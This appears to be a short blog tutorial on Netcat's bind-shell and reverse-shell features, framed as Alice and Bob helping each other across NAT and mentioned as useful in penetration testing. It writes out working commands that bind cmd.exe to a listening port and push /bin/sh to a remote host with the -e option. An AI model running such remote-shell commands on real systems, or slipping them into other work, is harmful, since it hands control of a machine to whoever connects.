In the first post in Netcat series, I have discussed a few basic features this amazing tool has. This time, I will elaborate more on two most useful ones – bind shell and reverse shell.

It is required to compile Netcat with -DGAPING_SECURITY_HOLE flag to enable -e option which executes a program after establishing or receiving a connection. When enabled, this option can redirect the input, output, and error messages of an executable to a TCP/UDP port rather than the default console.

Background

There is Alice and Bob. Bob is running Windows, Alice is on Linux. There are two possibilities to connect them and execute commands on each machine.

Scenario #1 – bind shell

Bob (Windows) has requested Alice’s (Linux) assistance. So Alice need somehow connect to Bob computer and be able to run a command line in Bob’s computer. Bob has public IP, but Alice is behind NAT (so does not have public IP).

In this case, Bob needs to bind cmd.exe to an open listening connection on TCP port:

$ nc -nlvp 666 -e cmd.exe
listening on [any] 666 ...

If you do not know what nlvp flags mean, take a look at another post where they are explained.

What we achieved there, is situation where Netcat has bound TCP port 666 to cmd.exe and will redirect any input, output or error messages to the network. In other words, the thing we need to do right now to connect to Bob’s machine is to try to connect to port 666 on Bob’s public IP address from Alice machine. Let’s assume Bob’s IP is 10.10.10.10

$ nc -nv 10.10.10.10 666
(UNKNOWN) [10.10.10.10] 666 (?) open
Microsoft Windows [Version 10.1.16244.340]
(c) 2018 Microsoft Corporation. All rights reserved.

As a result, Alice can execute commands on the Bob’s machine via bind shell.

Scenario #2 – reversel shell

This time, Alice has no control over the router in her home and needs help from Bob. Therefore, she is not able to forward traffic to her machine as Bob did in the previous example.

Although, Alice can bind to a port /bin/sh command. But that will not help – Bob will not be able to reach it due to restrictions on Alice router. We will circumvent it through leveraging another useful Netcat’s feature known as reverse shell. To make it work, Bob has to setup Netcat to listen for an incoming shell:

$ nc -nlvp 666 
listening on [any] 666 ...

Now, Alice can send a reverse shell from her computer to Bob’s machine, using his public IP address (11.11.11.11).

$ nc -nv 11.11.11.11 666 -e /bin/sh
(UNKNOWN) [11.11.11.11] 666 (?) open

Once the connection is established, Alice’s Netcat will redirect /bin/sh output/input/error streams to Bob’s connected machine on port 666. Thus, Bob will be able to execute commands on Alice’s computer.

Summary

Those are two very useful features which can help during penetration testing or examining issues on other’s people computers. Furthermore, consider the differences between this two approaches and how these may apply to various firewall configurations.